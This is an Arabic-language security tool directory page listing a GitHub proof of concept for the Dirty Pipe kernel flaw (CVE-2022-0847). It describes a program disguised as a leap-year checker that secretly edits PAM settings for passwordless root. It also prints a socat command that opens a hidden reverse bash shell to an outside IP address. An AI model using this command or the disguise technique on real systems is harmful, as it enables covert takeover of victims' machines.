Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-0847-Exploit-Implementation — استخدام CVE-2022-0847، "Dirty Pipe Exploit"، لفتح شل عكسي باش لتنفيذ تعليمات برمجية عشوائية على جهاز خارجي. | Kitploit
أدوات/GitHubGitHub/joeymeech/cve-2022-0847-exploit-implementation
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقتطوير الحمولاتاستغلال الملفات الثنائية
GitHubjoeymeech/cve-2022-0847-exploit-implementation

CVE-2022-0847-Exploit-Implementation

استخدام CVE-2022-0847، "Dirty Pipe Exploit"، لفتح شل عكسي باش لتنفيذ تعليمات برمجية عشوائية على جهاز خارجي.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
11منذ 3 سنواتلم تتم المراجعة بعد

تنفيذ استغلال CVE-2022-0847

هذا هو إثبات مفهوم يوضح كيفية فتح قشرة باش عكسية لتنفيذ تعليمات برمجية عشوائية على جهاز أجنبي باستخدام CVE-2022-0847، "استغلال الأنبوب القذر". تؤثر هذه الثغرة فقط على إصدارات نواة لينكس 5.8 أو أحدث، ولكن تم تصحيحها في الإصدارات 5.16.11 و5.15.25 و5.10.102 وما فوق. قم بتحديث نواتك :)

تم اكتشاف هذا الاستغلال من قبل باحث الأمن ماكس كيلمان. لن أخوض في تفاصيل هذا الاستغلال لأنه يفعل ذلك بشكل أفضل مما أستطيع في مقالته هنا: https://dirtypipe.cm4all.com/

يبدو هذا الإثبات كمفهوم بسيط لبرنامج سنة كبيسة يخبرك ما إذا كانت السنة المعطاة سنة كبيسة أم لا. في الخلفية، أقوم بتغيير سطر في /etc/pam.d/ أغير السطر auth sufficient pam_rootok.so إلى auth sufficient pam_permit.so هذا التغيير يسمح لنا بتشغيل الأوامر كمستخدم فائق دون إدخال كلمة مرور. بعد ذلك، يمكننا ببساطة استخدام دالة system() في C لتنفيذ الأوامر كـ su.

أقوم بتشغيل:

root@kitploit:~
su -c \"apt-get -y install socat\" > /dev/null; socat TCP4:172.23.46.133:4444 EXEC:/bin/bash & exit

يقوم هذا السطر بتثبيت socat على النظام وتوجيه المخرجات إلى ملف فارغ حتى لا يرى المستخدم مخرجات التحميل. بعد ذلك، أقوم بتنفيذ أمر socat للاتصال بجهاز أجنبي بعنوان IP ومنفذ محددين. الرمز & يضع هذه العملية في الخلفية بحيث بعد أن يغلق المستخدم الطرفية تظل الاتصال قائماً.

تنفيذ البرنامج على جهاز ضعيف:
صورة جهاز ضعيف

الاتصال بالجهاز الضعيف:
صورة جهاز أجنبي

تنزيل الأداة